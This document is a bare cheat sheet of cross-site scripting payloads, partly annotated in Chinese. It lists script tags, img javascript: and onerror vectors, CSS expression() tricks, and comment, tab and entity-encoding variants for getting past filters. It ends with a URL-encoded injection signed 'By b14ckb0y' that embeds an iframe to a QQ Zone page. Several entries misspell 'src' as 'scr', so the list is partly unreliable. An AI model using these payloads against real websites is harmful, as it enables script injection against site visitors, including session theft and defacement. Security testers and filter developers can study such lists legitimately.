<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (? = whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["